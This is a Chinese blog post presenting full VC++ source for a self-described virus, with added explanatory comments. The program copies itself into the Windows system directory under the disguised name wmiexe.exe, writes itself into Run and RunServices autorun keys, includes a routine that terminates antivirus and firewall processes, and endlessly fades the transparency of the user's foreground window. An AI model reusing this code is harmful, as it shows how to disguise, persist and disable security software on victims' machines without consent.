VC++ 关闭防火墙,写入注册表

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 启动项,实现开机自运行。病毒的表现是使用 SetLayeredWindowAttributes 函数,使当前窗口变为透明。

程序运行先关闭防火墙,写入注册表,再用LoadLibrary和GetProcAddress确定SetLayeredWindowAttributes函数位置,再用GetForegroundWindow得到当前窗口句柄,使其透明。

透明.cpp程序如下

#include "stdafx.h"

#include <winuser.h>

#include <windows.h>

#include <shellapi.h>

#include <tlhelp32.h>

#pragma comment(lib, "User32.lib")

// Alpha value applied to the foreground window; WinMain sweeps it between roughly 50 and 255.
unsigned char level;

// Not referenced anywhere in this listing.
char buffer[255];

// System directory from GetSystemDirectory; WinMain appends the copied file name to it.
char syspath[100];

// Path of the running executable, filled by GetModuleFileName.
char exefile[100];

// Last status code; only the CopyFile failure (err==32, ERROR_SHARING_VIOLATION) is inspected.
int err;

// Registry key handle reused for each Run/RunServices key opened in WinMain.
HKEY regkey;

// Single-instance guard; created with a name consisting only of spaces.
HANDLE hMutex;

// Signature of user32!SetLayeredWindowAttributes, resolved at run time with GetProcAddress.
typedef DWORD (WINAPI *PFUNC)(HWND,DWORD,BYTE,DWORD);

// Case-insensitive substring test: true when b (needle) occurs inside a (haystack).
// Case folding compares each character of a against c, c+32 and c-32, which only
// corresponds to upper/lower case for ASCII letters. The outer loop visits every
// candidate start position rather than returning on the first match.
bool instr(char* a,char* b)

{

// A needle longer than the haystack can never match.
if (strlen(a)<strlen(b)){return false;}

unsigned int i,j;

bool r=false;

for (i=0;i<strlen(a)-strlen(b)+1;i++)

{

// Candidate position: first character matches, ignoring ASCII case.
if ((a[i]==b[0])||(a[i]==b[0]+32)||(a[i]==b[0]-32))

{

r=true;

// Compare the rest of b at this offset; any mismatch clears r.
for (j=i;j-i<strlen(b);j++)

{

if ((a[j]!=b[j-i])&&(a[j]!=b[j-i]+32)&&(a[j]!=b[j-i]-32)){r=false;break;}

}

}

}

return r;

}

// Enumerates running processes with a Toolhelp32 snapshot and terminates those
// whose image name matches (via instr, case-insensitive).
//   opt == true  : targets "wmiexe.exe", the name this program copies itself
//                  under; WinMain calls this when CopyFile fails with error 32.
//   opt == false : targets a fixed list of process names (PFWMAIN, RAVMON,
//                  RAVTIMER, RAVSERVICE, CCENTER); the prose above describes
//                  this step as "closing the firewall". Nothing in this listing
//                  calls KillProc(false).
// The first snapshot entry is handled separately and the same checks are then
// repeated for every Process32Next entry. The PROCESSENTRY32 is allocated with
// new and never freed, and the OpenProcess handles are never closed.
void KillProc(bool opt)

{

// Snapshot of all processes on the system.
HANDLE handle=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

PROCESSENTRY32* info=new PROCESSENTRY32;

// Toolhelp requires dwSize to be set before the first enumeration call.
    info->dwSize=sizeof(PROCESSENTRY32);

if(Process32First(handle,info))

{

// Process32First succeeded; the code additionally checks the last error.
if(GetLastError()!=ERROR_NO_MORE_FILES )

{

if (opt)

{

// First entry: match against the program's own installed name.
if (instr(info->szExeFile,"wmiexe.exe"))

{

// Open the matching process and attempt to terminate it.
HANDLE h=OpenProcess(0,false,info->th32ProcessID);

TerminateProcess(h,0);

}

}

else

{

// First entry: match against the fixed list of process names.
if (instr(info->szExeFile,"PFWMAIN.EXE")||

instr(info->szExeFile,"RAVMON.EXE")||

instr(info->szExeFile,"RAVTIMER.EXE")||

instr(info->szExeFile,"RAVSERVICE.EXE")||

instr(info->szExeFile,"CCENTER.EXE"))

{

HANDLE h=OpenProcess(0,false,info->th32ProcessID);

TerminateProcess(h,0);

}

}

// Remaining entries: same two checks as above, repeated per process.
while(Process32Next(handle,info)!=FALSE)

{

if (opt)

{

if (instr(info->szExeFile,"wmiexe.exe"))

{

HANDLE h=OpenProcess(0,false,info->th32ProcessID);

TerminateProcess(h,0);

}

}

else

{

if (instr(info->szExeFile,"PFWMAIN.EXE")||

instr(info->szExeFile,"RAVMON.EXE")||

instr(info->szExeFile,"RAVTIMER.EXE")||

instr(info->szExeFile,"RAVSERVICE.EXE")||

instr(info->szExeFile,"CCENTER.EXE"))

{

HANDLE h=OpenProcess(0,false,info->th32ProcessID);

TerminateProcess(h,0);

}

}

}

}

}

// Only the snapshot handle is released; info is leaked.
   CloseHandle(handle);

}

// Entry point. hPrevInstance, lpCmdLine and nCmdShow are unused.
// Behaviour as written, in order:
//  1. If the running image is not under the system directory: copy it there as
//     wmiexe.exe (retrying; on error 32 / ERROR_SHARING_VIOLATION call
//     KillProc(true)), launch the copy with ShellExecute and exit.
//  2. Otherwise: create a named mutex as a single-instance guard, then write the
//     executable path as value "Tiancai" under the Run and RunServices keys of
//     both HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER (the autorun persistence
//     described in the prose above). Status codes are stored in err but not checked.
//  3. Resolve SetLayeredWindowAttributes from user32 and loop forever: add
//     WS_EX_LAYERED (0x80000) to the foreground window's extended style and
//     sweep its alpha (flag 2 == LWA_ALPHA) between roughly 50 and 255.
// Note: in this transcription the path separators inside the string literals and
// the `&` before regkey (rendered as `®`) are mangled; the listing does not
// compile as shown.
int APIENTRY WinMain(HINSTANCE hInstance,

                     HINSTANCE hPrevInstance,

                     LPSTR     lpCmdLine,

                     int       nCmdShow)

{

  // TODO: Place code here.

// Start fully opaque; d_level is the per-iteration alpha step (sign flips at the limits).
level=255;

int d_level=5;

HWND hwnd;

long win_long;

// Clear both path buffers.
strset(syspath,0);

strset(exefile,0);

// Own executable path and the system directory.
HMODULE module = GetModuleHandle(0); 

GetModuleFileName(module, exefile, sizeof (exefile)); 

GetSystemDirectory(syspath,100);

// Not yet running from the system directory: install a copy there.
if (!instr(exefile,syspath))

{

// Destination file name under the system directory.
strcat(syspath,"\wmiexe.exe");

// Retry until CopyFile succeeds; error 32 (sharing violation) triggers
// KillProc(true), presumably because an existing copy holds the file.
while (CopyFile(exefile,syspath,false)==0)

{

err=GetLastError();

if (err==32){KillProc(true);}

Sleep(10);

}

// Launch the installed copy and exit this instance.
ShellExecute(NULL,"OPEN",syspath,NULL,NULL,1);

Sleep(10);

ExitProcess(0);

}

else

{

// Single-instance guard: a named mutex whose name is a run of spaces.
hMutex = CreateMutex (NULL, TRUE, "          ");

if (GetLastError () == ERROR_ALREADY_EXISTS){::ExitProcess(0);}

// Autorun persistence: value "Tiancai" = own path, written to the Run and
// RunServices keys of both HKLM and HKCU. Return codes are not checked.
err=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",®key);

err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));

err=RegCloseKey(regkey);

err=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices",®key);

err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));

err=RegCloseKey(regkey);

err=RegOpenKey(HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",®key);

err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));

err=RegCloseKey(regkey);

err=RegOpenKey(HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices",®key);

err=RegSetValueEx(regkey,"Tiancai",0,REG_SZ,(const unsigned char *)exefile,strlen(exefile));

err=RegCloseKey(regkey);

}

// Resolve SetLayeredWindowAttributes dynamically; the module handle is never freed.
HMODULE m_hDLLUser32=LoadLibrary( "user32" );

PFUNC SetLayeredWindowAttributes =(PFUNC)::GetProcAddress( m_hDLLUser32, "SetLayeredWindowAttributes" );

// Infinite loop (see the goto below); there is no exit condition.
start:

//hwnd=FindWindow("Shell_TrayWnd",NULL);

hwnd=GetForegroundWindow();

// Skip the desktop window, the taskbar (Shell_TrayWnd) and Program Manager (Progman).
if ((hwnd!=0)&&

(hwnd!=GetDesktopWindow())&&

(hwnd!=FindWindow("Shell_TrayWnd",NULL))&&

(hwnd!=FindWindow("Progman",NULL)))

{

// Add WS_EX_LAYERED (0x80000) so the alpha setting below takes effect.
win_long=GetWindowLong(hwnd,GWL_EXSTYLE);

SetWindowLong(hwnd,GWL_EXSTYLE,win_long|0x80000);

// Flag 2 == LWA_ALPHA: use level as the window's opacity.
SetLayeredWindowAttributes(hwnd, NULL, level, 2);

}

Sleep(1);

// Reverse direction at the limits; pause one second when (almost) fully opaque.
if (level>=254){d_level*=(-1);Sleep(1000);}

if (level<=50){d_level*=(-1);}

level+=d_level;

goto start;

// Unreachable: the goto above never falls through.
return 0;

}

原文地址:https://www.cnblogs.com/hzcya1995/p/13318820.html